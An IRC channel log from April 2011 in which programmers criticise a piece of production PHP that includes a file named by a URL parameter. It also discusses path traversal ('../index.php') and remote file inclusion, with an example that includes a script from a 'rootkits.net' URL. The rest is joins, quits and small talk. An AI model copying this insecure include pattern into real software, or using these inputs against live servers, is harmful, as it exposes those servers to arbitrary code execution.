| --- Log opened Sat Apr 16 00:00:43 2011 |
| 00:08 | | You're now known as TheWatcher[T-2] |
| 00:12 | | You're now known as TheWatcher[zZzZ] |
| 00:27 | | celmin|away is now known as celticminstrel |
| 00:32 | < ToxicFrog> | :gonk: |
| 00:32 | < ToxicFrog> | ACTUAL PRODUCTION PHP CODE: |
| 00:32 | < ToxicFrog> | include "pages/" . $_GET['page'] . '.php'; |
| 00:32 | < celticminstrel> | o.O |
| 00:33 | < ToxicFrog> | Exercise for the reader: Assume that this is saved as /index.php. What happens when a browser requests "/index.php?page=../index.php"? |
| 00:33 | < celticminstrel> | Infinite include loop! |
| 00:34 | < ToxicFrog> | Bonus extra wtf: without the leading "pages/", this lets people execute arbitrary PHP code (which also means arbitrary shell code, which means absolutely anything they fucking want) on your server. |
| 00:34 | < ToxicFrog> | Because 'include "http://www.rootkits.net/deathmachine.php"' will in fact download and execute that script. |
| 00:35 | < ToxicFrog> | Reading the Coding Horrors thread is not good for my sanity. |
| 00:35 | < celticminstrel> | Huh, I did not know that. |
| 00:36 | < celticminstrel> | (That you can include a remote script, I mean.) |
| 00:36 | < celticminstrel> | Still, the leading "pages/" looks like it makes that impossible, unless I'm missing something. |
| 00:36 | < ToxicFrog> | It does. |
| 00:37 | < ToxicFrog> | Unless you have a host in DNS that answers to the name 'pages', anyways. |
| 00:38 | < celticminstrel> | So it will only let the user execute any script actually stored on the server. Which is still pretty bad though. |
| 00:42 | < ToxicFrog> | Yes. As I said. |
| 00:42 | < ToxicFrog> | Fucking PHP. |
| 01:06 | < gnolam> | Pfft. This is not PHP's fault. It's the coder's. |
| 01:08 | < ToxicFrog> | While the immediate blame rests on the coder, PHP gets a whole fucking pile of opprobium for actively encouraging shit like this. |
| 01:08 | < ToxicFrog> | Largely by billing itself as a "web-ready and web-oriented" language and then failing to include basic fucking safety and security features (and in some cases actively working against them). |
| 01:09 | < ToxicFrog> | It's still possible to make this sort of mistake in, say, Django, or Lift, but you have to know that's what you're doing. |
| 01:11 | < ToxicFrog> | PHP, on the other hand - in addition to being a security clusterfuck in and of itself - doesn't include any of the very basic features that these frameworks do, despite its advertising. |
| 01:12 | < ToxicFrog> | So people - often well-meaning but tragically misguided people - roll their own. |
| 01:12 | < ToxicFrog> | And 90% of the time they get it wrong, because if they had the background to get it right they probably wouldn't be using PHP. |
| 01:13 | < gnolam> | ... Framework VS Language. You don't see the difference? :P |
| 01:14 | < ToxicFrog> | Don't be obtuse, you know perfectly well what I'm saying. |
| 01:15 | < ToxicFrog> | PHP says (or clueless proponents of PHP - of which there are many - say) "you don't need an awkward framework with a huge learning curve! Unlike all those other languages, PHP is built from the ground up for web apps! Just dive in and start coding!" |
| 01:16 | < ToxicFrog> | And conveniently leaves the fact that it was "built from the ground up for web apps" by people with brain damage and a pathological fear of ever removing a feature no matter how broken and dangerous it is. |
| 01:16 | < ToxicFrog> | *leaves out. |
| 01:24 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has quit [Ping timeout: 121 seconds] |
| 01:41 | | gnolam [lenin@9D46A2.F4E9D7.E4B4CF.2072AD] has quit [[NS] Quit: Z?] |
| 01:58 | | Stalker [Z@26ECB6.A4B64C.298B52.D80DA0] has quit [Ping timeout: 121 seconds] |
| 02:28 | | Kindamoody[zZz] is now known as Kindamoody |
| 02:42 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has joined #code |
| 03:35 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has quit [Ping timeout: 121 seconds] |
| 04:08 | | Kindamoody is now known as Kindamoody[zZz] |
| 06:10 | | celticminstrel [celticminstre@Nightstar-f8b608eb.cable.rogers.com] has quit [[NS] Quit: And lo! The computer falls into a deep sleep, to awake again some other day!] |
| 06:33 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has joined #code |
| 06:33 | | shade_of_cpux is now known as cpux |
| 06:38 | | kwsn is now known as kwsn\t-2 |
| 06:40 | | kwsn\t-2 [kwsn@Nightstar-9d744862.dyn.centurytel.net] has quit [[NS] Quit: mo] |
| 06:50 | | cpux is now known as shade_of_cpux |
| 06:56 | < Alek> | "Will you do my term paper?" "What's the magic word?" "sudo" |
| 06:56 | | AnnoDomini [annodomini@D553D1.41311B.FD91D7.3AB41D] has joined #code |
| 06:57 | | Kindamoody[zZz] is now known as Kindamoody |
| 07:00 | < Alek> | "The cat fell asleep on my phone. Couldn't resist, IRCed a friend, 'Call me ASAP!'" |
| 07:08 | | Kindamoody is now known as Kindamoody|out |
| 08:18 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has quit [Client closed the connection] |
| 08:37 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has quit [Ping timeout: 121 seconds] |
| 08:40 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has joined #code |
| 09:06 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has joined #code |
| 09:20 | | You're now known as TheWatcher |
| 11:23 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has joined #code |
| 12:29 | | gnolam [lenin@Nightstar-38637aa0.priv.bahnhof.se] has joined #code |
| 12:30 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has quit [Client exited] |
| 15:03 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has joined #code |
| 15:17 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has quit [Ping timeout: 121 seconds] |
| 15:17 | | You're now known as TheWatcher[afk] |
| 15:18 | | celticminstrel [celticminst@1526F6.37AB0D.97233B.788A64] has joined #code |
| 15:43 | | shade_of_cpux is now known as cpux |
| 16:09 | | Stalker [Z@26ECB6.A4B64C.298B52.D80DA0] has joined #code |
| 17:24 | | kwsn [kwsn@BAD19E.B5A83A.180240.E5184B] has joined #code |
| 17:27 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has joined #code |
| 17:41 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has quit [[NS] Quit: ] |
| 18:20 | | kwsn [kwsn@BAD19E.B5A83A.180240.E5184B] has quit [[NS] Quit: brb reboot] |
| 18:53 | | kwsn [kwsn@Nightstar-9d744862.dyn.centurytel.net] has joined #code |
| 20:37 | < AnnoDomini> | How do I make chmod apply to subdirectories and their contents? |
| 20:38 | < AnnoDomini> | Alternatively, how do I change ownership of a folder and its contents? |
| 20:40 | < AnnoDomini> | Nevermind. |
| 20:42 | | Kindamoody|out is now known as Kindamoody |
| 21:50 | | kwsn is now known as kwsn\t-2 |
| 21:56 | | kwsn\t-2 is now known as kws-not-here |
| 22:49 | | You're now known as TheWatcher |
| 22:59 | | AnnoDomini [annodomini@D553D1.41311B.FD91D7.3AB41D] has quit [[NS] Quit: leaving] |
| --- Log closed Sun Apr 17 00:00:57 2011 |